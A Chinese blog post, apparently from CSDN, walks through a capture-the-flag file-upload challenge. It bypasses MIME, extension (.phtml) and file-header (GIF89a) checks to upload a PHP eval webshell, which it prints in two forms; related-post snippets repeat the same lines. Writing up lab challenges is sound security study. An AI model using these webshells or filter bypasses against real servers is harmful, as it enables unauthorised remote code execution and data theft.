BUUCTF__[极客大挑战 2019]Upload_题解

最新推荐文章于 2024-04-24 19:59:15 发布
最新推荐文章于 2024-04-24 19:59:15 发布
阅读量712 收藏 5
点赞数
分类专栏: BUU做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/107166499
版权

前言

  • 明天开始高考,看戏准备。

读题

  • 文件上传,先创建一个PHP一句话木马文件。上传抓包。在这里插入图片描述

  • 提示不是图片
    在这里插入图片描述

  • 修改文件 MIME类型,改为png的形式。提示不能有php。

  • 就两处有php,定位一下发现是文件名不能为php。

  • 寻找代替方法

    .php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml

  • 最终发现.phtml 可行。提示还不是图片。
    在这里插入图片描述

  • 还有可能验证了文件头。加一个。
    在这里插入图片描述

  • 没想到加了个 gif 文件的文件头也可以,文件头具体内容可以自己了解。

  • 上传成功,蚁剑连接运行虚拟终端,执行cat /flag

  • 成功得到flag。
    在这里插入图片描述

  • 有一点是用的php一句话木马直接优先用

     <script language="php">eval($_POST['a']);</script>

  • 这里如果直接用这个还会报错。

     <?php  @eval($_POST['post']) ?>

最后

  • 这里刚开始我发现可以上传.htaccess 文件,因为可以用它来解析gif文件执行php。但最后文件是上传了,但蚁剑就是连不上。不过这也是一种方法。

  • 附上题目链接

  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。

  • 最后欢迎来访个人博客

风过江南乱
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1028
Upload=> 文件上传漏洞。
acm.rar_浙江大学 ACM 题解
09-24
【标题】"acm.rar_浙江大学 ACM 题解" 涵盖的是关于浙江大学在ACM(国际大学生程序设计竞赛)方面的训练资料和解题思路。这些资源通常包括历年的竞赛题目、官方解答以及参赛者们分享的解题策略,旨在帮助学习者提升...
BUUCTF[极客挑战2019]Upload
weixin_45253622的博客
05-07 174
文件上传过滤和绕过 打开题目,发现了一个可以上传图片的上传点。 我们上传一句话木马试试; 会显示不是图片,我们BP抓包修改类型试试:(由于电脑把我的一句话删掉了,所以这里使用phtml来上传一句话木马) phtml就是嵌入php代码的html文件。 修改类型为:image/jpeg 放包发现: 盲猜后台上传地址为 http://52159d7e-a98b-453c-ab5e-6f3741dd9748.node3.buuoj.cn/upload/ 菜刀连接:http://5215
buuctf-[ACTF2020 新生赛]Upload(小宇特详解)
小宇的web博客
01-15 2759
buuctf-[ACTF2020 新生赛]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
[极客挑战 2019]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 485
添加头文件:GIF89a改文件格式为image/jpegcheck。
BUUCTFUpload [极客挑战 2019]
金 帛的博客
04-19 1234
BUUCTF的WP
BUUCTF--BUU UPLOAD COURSE 1
m0_62879498的博客
03-03 7326
BUUCTF–BUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: 我们没有办法访问,使用AntSword进行连接也是报错 题目没有设置上传后缀的限制 但是上传之后任意后缀形式都会被改成.jpg格式(无论我们使用什么办法,包括BP改包,放包后依旧以 .jpg 的格式储存),换句话说 .htaccess 配置文件, 也无法使用我们无法使用中国剑蚁进行连接。 查询了大佬的博客
BUUCTF/Upload-Labs-Linux
weixin_44041994的博客
03-20 1132
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
大整数的因子_题解noip_源码
10-04
在编程竞赛领域,如NOIP(全国青少年信息学奥林匹克联赛),常常会遇到处理大整数问题,本题目的核心就是探讨如何找到一个大整数的所有个位数因子。在这个问题中,我们不需要进行完整的高精度运算,而是巧妙地利用低...
leetcode题解_leetcode_leetcode题解_
09-29
它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括每道题目的详细描述、解题思路、最优解法、代码实现以及可能的优化策略。 一...
中国大学生数学建模竞赛题解_matlab
04-17
《中国大学生数学建模竞赛题解_matlab》这个资源主要关注的是如何利用MATLAB这一强大的数值计算和编程环境来解决数学建模问题。MATLAB,全称Matrix Laboratory,是为科学计算、工程分析以及数据分析等领域设计的一种...
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
这个名为"leetcode部分题解.rar_java_leet 程序员_leetcode"的压缩包,显然是一个专门为Java程序员准备的LeetCode题目详解资源,旨在帮助他们更好地应对面试中的技术挑战。 LeetCode涵盖了从基础到高级的各种问题,...
BUUCTF upload
wwwwyyyrre的博客
03-27 200
果然 用了js前端验证 关掉之后试着上传php php3 php5 phtml文件 发现phtml文件可以上传成功。这里之所以用phtml文件 是因为phtml文件可以被解析 图片马虽然有上传路径但是无法链接成功。发现不能是php文件 把文件后缀改成jpg形式 发现有后端过滤文件中不能包含<?这道题只要上传的不是jpg、png、gif结尾的图片都抓不了包 怀疑用了前端验证。上传php文件 发现不可以 并给显示 只可以上传jpg、png、gif结尾的图片。用蚁剑连接成功 在根目录找到flag。
BUUCTF_[ACTF2020 新生赛]Upload解题思路
时光不老的博客
01-10 488
[ACTF2020 新生赛]Upload
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1875
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1332
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF-WEB-[极客挑战 2019]Upload
r1727337824的博客
09-06 521
BUUCTF-WEB-[极客挑战 2019]Upload
解决关于php中文文件下载问题
小虎哥-把不可能的变成可能
08-20 156
以下功能是在php中判断下载文件是否存在(包括中文、英文等),不存在则提示,存在便以服务器上的原名称下载,当然也可以自定义名称。 首先说明一点,网站目录如下: / ....down.html ....sphinx技术交流.zip ....Lib ......download.php 当然如果对网站的相对路径和绝对路径理解比较熟悉的,可以不用了解这目录布局,直接看源程序。...
buuctf web 极客挑战2019 Upload
Ethan552525的博客
09-12 624
题目: 解题: 1:上传“一句话木马”文件 编辑文件a.php: <?php @eval($_POST['shell']);?> 上传后得到: Not image! 提示需要上传文件为 image。 2:修改Content-Type 上传a.php文件时,用burp suite抓包得到: 修改Content-Type为 image/gif 提示:NOT ...
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值